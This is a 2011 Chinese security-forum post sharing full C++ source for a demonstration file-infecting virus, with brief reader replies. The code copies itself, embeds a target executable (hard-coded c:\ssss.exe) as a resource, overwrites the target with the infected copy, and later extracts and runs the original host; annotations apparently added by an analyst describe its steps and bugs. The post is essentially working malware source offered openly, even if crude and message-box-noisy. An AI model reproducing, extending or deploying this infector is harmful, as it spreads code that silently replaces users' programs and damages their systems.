
[旧帖] [原创]很土的感染EXE文件的方法。 0.00元

2011-9-18 22:44 1985

发表一段感染EXE文件的病毒代码:

#include "stdafx.h"

/*
 * WinMain - entry point of a demonstration file infector that carries the
 * original ("host") program inside its own resource section.
 *
 * What the visible code does, in order:
 *   1. Creates two temp files in the system directory (GetTempFileName with
 *      the prefixes "vic" and "host") and copies its own image to the first.
 *   2. Loads that copy and looks for RT_RCDATA resource 104. If present, the
 *      resource bytes are written to the second temp file, which is then
 *      started with CreateProcess using the current command line.
 *   3. Reads the hard-coded target c:\ssss.exe into memory, stores those
 *      bytes as RT_RCDATA resource 104 in the temp copy, and copies the temp
 *      copy over the target.
 *   4. Deletes both temp files.
 *
 * Notes for analysts (artifacts that follow from the calls below):
 *   - GetTempFileName uses at most the first three characters of the prefix,
 *     so the files show up as vic*.tmp and hos*.tmp in the system directory.
 *     Writing there typically needs administrative rights on current Windows.
 *   - A process is launched from a .tmp file located in the system directory.
 *   - The target is replaced wholesale by CopyFile, so its size and hash
 *     change; NOTE(review): a code signature on the original would presumably
 *     no longer verify on the replacement - confirm on a sample.
 *   - Temp-file cleanup sits inside the ReadFile-success branch only; when the
 *     target cannot be opened or read, the temp files stay on disk.
 *
 * Return values of most API calls are not checked in this listing.
 */
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
 	// TODO: Place code here.
char syspath[256];                 // receives the system directory path
TCHAR src[MAX_PATH]="xx.exe";      // not referenced again in the visible code
TCHAR szMyName[MAX_PATH];          // full path of the running image
TCHAR szTempFileA[MAX_PATH];       // temp copy of this executable ("vic" prefix)
TCHAR szTempFileB[MAX_PATH];       // temp file for the extracted host ("host" prefix)
GetSystemDirectory(syspath,256);
GetModuleFileName(NULL,szMyName,MAX_PATH);
HANDLE hFile;
DWORD dwFileSize, 
dwBytesRead;
STARTUPINFO si;
PROCESS_INFORMATION pi;
// 0x1000 is MB_SYSTEMMODAL; the dialog announces that this is a demo virus.
MessageBox(NULL,"这是一个病毒,你可以选择感染的文件,也可不选~","演示病毒UpadatResource 1.0",0x1000);
// uUnique == 0: the API picks a unique name and creates the (empty) file.
GetTempFileName(syspath,"vic",0,szTempFileA);
GetTempFileName(syspath,"host",0,szTempFileB);
CopyFile(szMyName,szTempFileA,0);// the virus body (this executable) is copied into szTempFileA
HMODULE hLibrary;
HRSRC hResource;
HGLOBAL hResourceLoaded;
LPBYTE lpBuffer;
// The temp copy is loaded so its resources can be read.
hLibrary = LoadLibrary(szTempFileA);
if (NULL != hLibrary)
{

		
	hResource = FindResource(hLibrary, MAKEINTRESOURCE(104), RT_RCDATA);  [COLOR="Magenta"]// look up the specified resource; if it is found, it is written to a temp file and executed.[/COLOR]
        if (NULL != hResource)

		{
           
			hResourceLoaded = LoadResource(hLibrary, hResource);
              
			if (NULL != hResourceLoaded) 
			
			{

				lpBuffer = (LPBYTE) LockResource(hResourceLoaded); 

				if (NULL != lpBuffer) 

				{ 

					DWORD dwBytesWritten;

					// Size of the embedded host image stored as resource 104.
					dwFileSize = SizeofResource(hLibrary, hResource);

					// CREATE_ALWAYS truncates the placeholder file made by GetTempFileName.
					hFile = CreateFile(szTempFileB,

						GENERIC_WRITE,

						0,

						NULL,

						CREATE_ALWAYS,

						FILE_ATTRIBUTE_NORMAL,

						NULL);


					if (INVALID_HANDLE_VALUE != hFile)

					{


							// Shows the temp path as text and the command line as caption.
							MessageBox(NULL,szTempFileB,GetCommandLine(),0x1000);
	
						// dwBytesWritten is not compared with dwFileSize afterwards.
						WriteFile(hFile, lpBuffer, dwFileSize, &dwBytesWritten, NULL);


						CloseHandle(hFile);

					}

					GetStartupInfo(&si);

					// Runs even when the CreateFile above failed (this call is outside
					// that if-block). The result is not checked and the handles in pi
					// are not closed anywhere in the visible code.
					CreateProcess(szTempFileB,GetCommandLine(),NULL,NULL,NULL,NULL,NULL,NULL,&si,&pi);
	
					MessageBox(NULL,szTempFileB,GetCommandLine(),0x1000);

				}

			} 

		}

FreeLibrary(hLibrary);
}

char Filename[256] = "c:\\ssss.exe"; // path of the file to be infected (hard-coded)
// Share mode 0: the open fails while another process holds the target open.
hFile = CreateFile(Filename, GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);

if(INVALID_HANDLE_VALUE == hFile)
{
	// Message text says that opening the HOST file failed.
	MessageBox(NULL,"HOST文件打开失败","。",0x1000);
}
if (INVALID_HANDLE_VALUE != hFile)
{
		

// High-order size DWORD is ignored (second argument is NULL).
dwFileSize = GetFileSize(hFile, NULL);

lpBuffer = new BYTE[dwFileSize];

if (ReadFile(hFile, lpBuffer, dwFileSize, &dwBytesRead, NULL) != FALSE)
{
	

// The HANDLE returned by BeginUpdateResource is stored in the HRSRC variable
// via a cast. FALSE = keep the existing resources of the temp copy.
hResource = (HRSRC)BeginUpdateResource(szTempFileA, FALSE);
if (NULL != hResource)
{

	
// Stores the whole target file as RT_RCDATA resource 104, the same id the
// extraction branch above searches for.
if (UpdateResource(hResource,
RT_RCDATA,
MAKEINTRESOURCE(104),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPVOID) lpBuffer,
dwFileSize) != FALSE)
{

// FALSE = write the pending changes to szTempFileA. Only reached when
// UpdateResource succeeded.
EndUpdateResource(hResource, FALSE);
}

}

// Buffer and file handle are released on this (ReadFile succeeded) path only.
delete [] lpBuffer; 
CloseHandle(hFile);


// bFailIfExists == 0: the existing target is overwritten by the temp copy.
if(CopyFile(szTempFileA,Filename,0))
{
		//	MessageBox(NULL,Filename,szTempFileA,0x1000);
}//Any Thing is every thing~
Sleep(1000);


DeleteFile(szTempFileA);
// Busy-waits until the extracted host file can be deleted.
// NOTE(review): presumably the delete fails while the process started from
// that file is still running - confirm; the loop has no delay or exit path.
while(!DeleteFile(szTempFileB)) ;
}
}

	return 0;
}






最新回复 (10)
cooseasy 2011-9-18 22:54
看看再说、六个字!
skylin林子 2011-9-19 10:00
看看再说,呵呵
dayang 2011-9-19 10:04
这东西主要是兼容性必须得好
sixge 2011-9-19 10:41
看不懂,不过啊还是谢谢
elianmeng 1 2011-9-19 10:47
我想问一下 有什么意义
hezhang 2011-9-19 11:32
嗯  果然。。。
symanli 2011-9-20 12:02
学习啊啊
小P孩儿 2011-9-20 13:07
好怕怕的东西
傻子晴天 2011-9-20 17:33
不错,学习了
qeqe 2011-9-20 23:54
感染起来原来是这么简单啊